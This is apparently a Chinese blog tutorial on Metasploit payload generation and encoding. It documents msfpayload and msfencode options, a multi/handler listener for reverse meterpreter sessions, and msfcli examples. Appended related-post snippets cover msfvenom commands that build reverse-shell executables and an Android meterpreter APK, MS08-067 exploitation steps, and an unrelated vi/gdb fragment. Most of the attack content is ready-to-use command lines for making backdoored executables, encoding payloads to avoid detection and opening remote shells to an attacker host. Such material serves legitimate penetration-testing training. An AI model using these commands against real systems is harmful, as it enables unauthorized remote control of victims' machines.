metasploit攻击载荷独立封装和编码

封装攻击载荷
msfpayload:
Usage:
msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]>
Summary:summary and optons of payload
C:C language
Perl:Perl
Ruby:Ruby
Raw:Raw,allows payload to be piped into msfencode and other tools
Js:JavaScript
eXe:windows executable
Dll:Dll
Vba:VBA
War:war package

example:
msfpayload -l | grep windows | grep reverse_tcp | grep meterpreter
msfpayload windows/meterpreter/reverse_tcp O:show options
msfpayload [payload] X >xx.exe

攻击载荷编码
msfencode:
Usage:
msfencode <options>
OPTIONS:
-a <opt>  The architecture to encode as:哪种体系结构编码
-b <opt>  The list of characters to avoid: ‘\x00\xff‘:指定要避免的字符
-c <opt>  The number of times to encode the data:编码数据的次数
-d <opt>  Specify the directory in which to look for EXE templates:指定搜索exe模板的目录
-e <opt>  The encoder to use:使用的编码器
-h        Help banner:帮助标题
-i <opt>  Encode the contents of the supplied file path:为提供的文件内容编码
-k        Keep template working; run payload in new thread (use with -x):让模板继续工作;即让载荷在新线程中运行
-l        List available encoders:列出可用的编码器
-m <opt>  Specifies an additional module search path:制定一个额外的模板搜索路径
-n        Dump encoder information:输出编码器信息
-o <opt>  The output file:输出文件
-p <opt>  The platform to encode for:要编码的平台
-s <opt>  The maximum size of the encoded data:编码后的最大字节数
-t <opt>  The output format:输出格式 bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,vba,vba-exe,vbs,war
-v        Increase verbosity:增加冗长
-x <opt>  Specify an alternate executable template:指定一个备用的可执行文件模板

受害会话接收
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST x.x.x.x LPORT xxxx
msf exploit(handler) > exploit
[*] Started reverse handler on x.x.x.x:xxxx
[*] Starting the payload handler...

也可以不打开msfconsole,用msfcli
Usage:
msfcli <exploit_name> <option=value> [mode]
Mode           Description
----           -----------
(A)dvanced     Show available advanced options for this module显示这个模块可用的高级选项
(AC)tions      Show available actions for this auxiliary module显示辅助模块的可用行为
(C)heck        Run the check routine of the selected module为所选模块检查运行历程
(E)xecute      Execute the selected module执行所选模块
(H)elp         You‘re looking at it baby!么么大
(I)DS Evasion  Show available ids evasion options for this module
(O)ptions      Show available options for this module
(P)ayloads     Show available payloads for this module
(S)ummary      Show information about this module
(T)argets      Show available targets for this exploit module

Examples:
msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E
msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=6555 E

metasploit攻击载荷独立封装和编码

时间: 2024-10-11 02:23:11

metasploit攻击载荷独立封装和编码的相关文章

MSF攻击载荷的生成

1.查看该模块的可用参数 msfvenom -p windows/shell_reverse_tcp --list-options 2.生成攻击载荷 msfvenom -p windows/shell_reverse_tcp LHOST=10.180.7.20 LPORT=31337 -f exe -o payload1.exe其中:-f 表示输出格式-o 表示保存payload为一个文件 3.接下来在MSF终端启动一个监听器 载入multi/handler模块设置攻击载荷为windows反弹s

利用metasploit攻击有ms8067漏洞的PC机过程

拓扑环境:2台虚拟机,一台Kali,另一台有ms08067漏洞的XP或2000或2003机器 msfconsole进入msf控制台 输入search ms0-067 找到相应模块 use exploit/windows/smb/ms08_067_netapi  使用相应模块 set PAYLOAD windows/meterpreter/reverse_tcp 设置反弹连接 show options 查看设置选项 set RHOST 192.168.80.XX 设置远程主机 set LHOST

利用Metasploit攻击Android

首先我在Kali下生成一个Android的应用程序,即apk格式的文件,用到的命令是: msfvenom -p android/meterpreter/reverse_tcp LHOST=本地ip LPORT=监听端口 R > /root/rb.apk 注释:-p:指的是在本次环境中攻击所使用的payload,这个payload就是将Android攻击成功之后的反弹连接发送到攻击者的终端上来:' LHOOST与LPORT指的是本地反弹的ip地址与本地监听端口: -R:表示要生成的文件类型: >

常见的音视频封装和编码

常见的的音视频封装和编码格式是怎么样的? 封装格式的推出机构和领域? 封装格式数据结构是什么样的? 视频播放器原理 播放器在显示上,可以分为DirectShow框架的工具,比如VLC,mplayer:非DirectShow框架的工具,如暴风影音,potplayer 哪些工具可以查看音视频文件的信息? Elecard Format Analyer可以看出来数据是如何封装到一起的.

metasploit框架介绍(一)

Metasploit体系框架 V4版本体系结构: Metasploit设计尽可能采用模块化的理念:在基础库的基础上,提供了一些核心框架功能的的支持:实现渗透测试的功能的主体代码则以模块化方式组织,并按照不同用途分为6种类型模块:为了扩充metasploit框架对渗透测试全过程的支持功能特性,metasploit还引入了插件机制,支持将外部的安全工具集成到框架中:metasploit框架对集成模块与插件的渗透测试功能,通过用户接口与功能程序提供给渗透测试者进行使用. 基础库文件 metasploi

Metasploit 渗透测试魔鬼训练营读书笔记(连续更新一)

1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防战术与作战能力.在信息科技的发源地--美国的军事演习中,将美军称为"蓝军",将假想敌称为"红军",而这种军事演习的方式也在20世纪90年代时,由美国军方与国家安全局引入到对信息网络与信息安全基础设施的实际攻防测试过程中.由一群受过职业训练的安全专家作为"红队"(Red Team),对接受测试的防御方"蓝队

metasploit常用命令

service apache2 start service postgresql start msfconsole启动 1.MSF终端命令 show exploit 列出metasploit框架中的所有渗透攻击模块. show payloads 列出metasploit框架中的所有攻击载荷. show auxiliary 列出metasploit框架中的所有辅助攻击模块. search name 查找metasploit框架中的所有渗透攻击和其他模块. info 展示出制定渗透攻击或模块的相关信

Metasploit渗透测试魔鬼训练营

首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试专家领衔撰写,极具权威性.以实践为导向,既详细讲解了Metasploit渗透测试的技术.流程.方法和技巧,又深刻阐释了渗透测试平台背后蕴含的思想. 本书是Metasploit渗透测试领域难得的经典佳作,由国内信息安全领域的资深Metasploit渗透测试专家领衔撰写.内容系统.广泛.有深度,不仅详细讲解了Metasploit渗透测试的技术.流程.方法和技巧,而且深刻揭示了渗透测试平台背后蕴含的思

11111

一.逆向bof 按ESC键 :%!xxd         将显示模式切换为16进制模式 /e8d7         查找要修改的内容,/后面是要查找的内容 ESC+I键       可在文档中插入语句(insert) ESC+R键      字母替换 :%!xxd -r       转换16进制为原格式 :wq            存盘退出vi l  gdb调试程序 gdb 可执行文件名            进入调试 r                            run,执行程序